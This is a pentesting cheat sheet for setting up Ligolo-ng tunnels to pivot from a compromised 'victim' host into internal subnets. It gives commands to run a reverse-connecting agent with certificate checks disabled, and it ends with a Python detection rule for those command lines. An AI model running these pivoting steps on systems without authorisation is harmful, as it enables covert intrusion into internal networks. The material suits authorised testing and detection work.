Tunneling with Ligolo-ng

Modern Pivoting Techniques

Introduction

I like to use Ligolo-ng for tunneling because it allows me to route traffic through an interface like a VPN instead of having to rely on a bunch of SOCKS tunnels. It also works cross-platform on both Linux and Windows and can be used in much the same way as a traditional C2 system, establishing sessions to victims and issuing commands.

Ligolo-ng can be downloaded from GitHub, and fairly extensive documentation is available on the project wiki.

The goal of this post is to essentially serve as a cheat sheet for the tool, providing the commands and scripts required to quickly and easily establish tunnels during engagements.

Setup

The commands below download the proxy server and agent archives, unzip them, and give execute permissions to the Linux server binary. Make sure the agent and proxy are the same version and that each is built for the OS it will run on.

```bash
wget -q https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_windows_amd64.zip
wget -q https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz
unzip ligolo-ng_agent_0.6.2_windows_amd64.zip
tar xvf ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz
chmod +x proxy
```

Start the Proxy Server

Next, the Ligolo-ng server must be started on the attacking host:

```bash
sudo ./proxy -selfcert
```

Connect the Agent

Copy the Ligolo-ng agent to the victim machine and run it to establish a connection:

```powershell
.\agent.exe -connect <kaliIP>:11601 -ignore-cert
```

Establish the Tunnel

Catch the created session and join it. Then create an interface and start the tunnel:

```
session
1
interface_create --name ligolo
tunnel_start --tun ligolo
```

Add Routes

Lastly, add a route to the subnet(s) you are trying to reach. Specify dev for device and then pass the name of the interface we created in Ligolo-ng:

```bash
sudo ip route add <subnet>/24 dev ligolo
```

Conclusion

The tunnel should now be set up, routing all traffic destined for the specified subnet through Ligolo-ng and the victim machine. This provides a clean, VPN-like interface for pivoting into internal networks during penetration tests.
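For the defensive view of the agent command in "Connect the Agent", the added example below (not part of the original post or the Ligolo-ng project) scores process command lines on the `-connect` and `-ignore-cert` flags and port 11601 shown above, ignoring the image name because the binary can be renamed. The event records, weights, threshold and the extra `--flag` / `-flag=value` spellings it accepts are assumptions made for the example.

```python
import re

DEFAULT_PORT = 11601  # port in the agent command on this page
# Weights and threshold are assumptions chosen for this example.
WEIGHTS = {"connect-flag": 1, "default-port": 2, "ignore-cert": 2}
FLAG_RE = re.compile(r"^--?(?P<name>[\w-]+)(?:=(?P<val>.*))?$")

def parse_flags(cmdline):
    """Return {flag: value} for -f v, --f v and -f=v spellings."""
    flags, tokens = {}, cmdline.split()
    for i, tok in enumerate(tokens):
        m = FLAG_RE.match(tok)
        if not m:
            continue
        val = m.group("val")
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if val is None and not nxt.startswith("-"):
            val = nxt
        flags[m.group("name").lower()] = val or ""
    return flags

def score(cmdline):
    """Score arguments only; the image name is ignored because binaries get renamed."""
    flags, reasons = parse_flags(cmdline), []
    host, _, port = flags.get("connect", "").rpartition(":")
    if host and port.isdigit():
        reasons.append("connect-flag")
        if int(port) == DEFAULT_PORT:
            reasons.append("default-port")
    if "ignore-cert" in flags:
        reasons.append("ignore-cert")
    return sum(WEIGHTS[r] for r in reasons), reasons

def detect(events, threshold=3):
    """Return the events whose command line scores at or above the threshold."""
    return [e for e in events if score(e["cmdline"])[0] >= threshold]

# Constructed process-creation records (not real telemetry).
EVENTS = [
    {"host": "WS01", "cmdline": r".\agent.exe -connect 203.0.113.10:11601 -ignore-cert"},
    {"host": "WS02", "cmdline": r"C:\Users\Public\upd.exe --connect=203.0.113.10:443 --ignore-cert"},
    {"host": "WS03", "cmdline": r"C:\Tools\backup.exe -connect nas01:8443"},
    {"host": "WS04", "cmdline": r"C:\Windows\System32\ping.exe 203.0.113.10"},
]

if __name__ == "__main__":
    for e in detect(EVENTS):
        print(e["host"], *score(e["cmdline"]))
```

The renamed binary on a non-default port (WS02) is still flagged through the flag combination, while a lone `-connect host:port` (WS03) stays below the threshold.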